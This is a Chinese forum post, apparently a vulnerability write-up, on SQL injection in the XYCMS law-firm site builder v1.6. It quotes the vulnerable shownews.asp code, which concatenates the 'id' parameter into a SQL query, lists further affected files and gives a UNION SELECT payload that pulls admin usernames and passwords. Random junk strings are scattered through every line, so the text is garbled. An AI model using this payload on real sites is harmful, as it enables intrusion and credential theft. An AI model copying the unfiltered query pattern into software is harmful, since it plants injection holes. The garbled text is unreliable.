前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似- C8 `$ _; p5 d( s+ h
1 O C: Q$ z# _5 h5 B
淫荡分割线( g4 k6 ?3 R& u( \9 @- b
--------------------------------------------------------
; Q. s4 x+ G6 `4 u! i- k 1 w7 c+ p/ m3 B6 u: @4 D: P
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
' y) D4 F6 G# H5 S源码地址:http://down.chinaz.com/soft/29233.htm7 N; r! l/ e& b
) t' T+ ^9 Y# B- k* k7 |
漏洞文件:shownews.asp! |. m; k* u$ @, |) C0 G0 h1 ~
漏洞代码:7-13行, v/ d3 g$ h6 O( W9 s
3 q1 u, m/ Y' z& e
; \9 B; d# _( A6 C. l. u Q" V<% ' Y; i$ J! g3 h8 ~$ I. [+ D o! M
id=request.QueryString("id")" `' K3 A+ t' | n: G+ H
- A- l3 \' w0 D) \: Gset snews=server.createobject("adodb.recordset") 1 p2 l5 [; b4 r" ~' [
exec="select * from [news] where id="&id
4 s& O* i2 `! P! U, R' t8 C, qsnews.open exec,conn,1,1! i- w5 @3 i' D( E5 H
%>
! s) k/ n& u5 C( h0 P
& }" l: W7 H7 D$ ^$ A, Z
9 h5 t& s! q5 j( T4 W9 }6 S什么过滤都没有 直造成注入
8 R4 q- j) G$ ]# S0 _) e1 ] 2 O! N, W4 o( @5 E/ B% N* z3 H
注入点:http://127.0.0.1:99/shownews.asp?id=xx7 W: N- a3 [9 u( O4 k+ R1 M8 l
% S! O6 |( K- ~6 Q4 g( f其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找0 I3 O! Y1 y8 w. B; ~+ T4 D
/ H9 R, ^* T3 }: }. K
@7 f6 {7 a, Y. t$ Q
exp: union select 1,admin,password,4,5,7 from admin_user2 v4 d9 i+ z5 z0 A) d8 s7 l
' t# g. V% K0 W4 g' V. y; J3 t |